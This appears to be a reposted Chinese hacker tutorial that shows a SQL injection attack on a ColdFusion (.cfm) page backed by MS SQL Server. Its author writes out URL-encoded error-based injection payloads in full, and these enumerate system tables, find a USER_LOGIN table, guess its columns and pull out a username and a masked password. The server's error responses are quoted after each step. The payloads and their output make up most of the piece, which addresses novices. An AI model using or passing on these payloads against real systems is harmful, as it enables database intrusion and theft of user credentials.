当前位置 : 主页 > 网络编程 > 其它编程 >

对cfm的一个攻击实例

来源:互联网 收集:自由互联 发布时间:2023-07-02
好郁闷快考试了抽空上上网。到这个地址的时候习惯性的看看他有没有安全漏洞http:www.test.comopenaccessinde 好郁闷快考试了抽空上上网。到这个地址的时候习惯性的看看他有没有安全漏洞
好郁闷快考试了抽空上上网。到这个地址的时候习惯性的看看他有没有安全漏洞http:www.test.comopenaccessinde

好郁闷快考试了抽空上上网。到这个地址的时候习惯性的看看他有没有安全漏洞 http://www.test.com/openaccess/index.cfm?ID11提交 http://www.test.com/openaccess/index.cfm?ID11 返回 Error Occurred While Processing Request Error Diagnostic Information ODBC Error Code 37000 (Syntax error or access violation) [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword ’order’. The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (72:1) to (72:47). Date/Time: 06/05/04 13:37:57 Browser: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Remote Address: 61.178.21.189 Query String: ID11; 其实cfm的攻击也和asp一样简单看上面的返回信息比asp的返回还详细。 不过好象对cfm很少有人写所以就写出来了。上面是mssql的数据库很多方法都可以用 为了面向广大的菜鸟爱好者这里就只说说怎么爆表吧。 对asp的跨cool大家都很熟悉了吧那么现在来cool一把cfm 提交 and 0(select count(*) from master.dbo.sysdatabases where name>1 and dbid6) 郁闷没返回我们期待的东西他不给我我就换方法要再来。 提交 and%201(Select%20top%201%20name%20from(Select%20top%2012%20id,name%20from%20sysobjects%20where%20xtypechar(85))%20T%20order%20by%20id%20desc) 返回 Error Diagnostic Information ODBC Error Code 22005 (Error in assignment) [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’ANALYST_MST’ to a column of data type int. The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (50:2) to (50:51). 。。。。。。 看到了吧哈哈小竹的这个语句就是猛啊 现在就一个一个查吧换掉top%201%20name中的1从1开始到6的时候返回一个期待的东西 。。。。。。。 [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’USER_LOGIN’ to a column of data type int. 。。。。。。。 看见USER_LOGIN表了吧说不定就有密码在里面。 现在就看看里面有什么东西胜利就在眼前了冲啊。。。 提交 and%201(Select%20Top%201%20col_name(object_id(’USER_LOGIN’),1)%20from%20sysobjects) 返回 。。。。。 Microsoft][ODBC SQL Server Driver][SQL Server]Line 2: Incorrect syntax near ’USER_LOGIN’. 。。。。。 我倒怎么这样吸根烟再说。干脆用猜吧像 and 1(select%20user_id%20from%20USER_LOGIN) 猜不出来再说了。。。 出来了哈哈user_id 连续提交得到几个字段 user_id user password没办法啊100%的猜中率。 好了已经到了最后一步了我们继续来啊 and%200(select%20user%20from%20USER_LOGIN%20where%20user>1) 出来了用户是kimeng下面爆他的密码 and%200(select%20password%20from%20USER_LOGIN%20where%20password>1) 哈哈出来了不好意思马赛克处理***** 随便写写没什么技术活。 http://www.itlearner.com/work/hexsql.asp

网友评论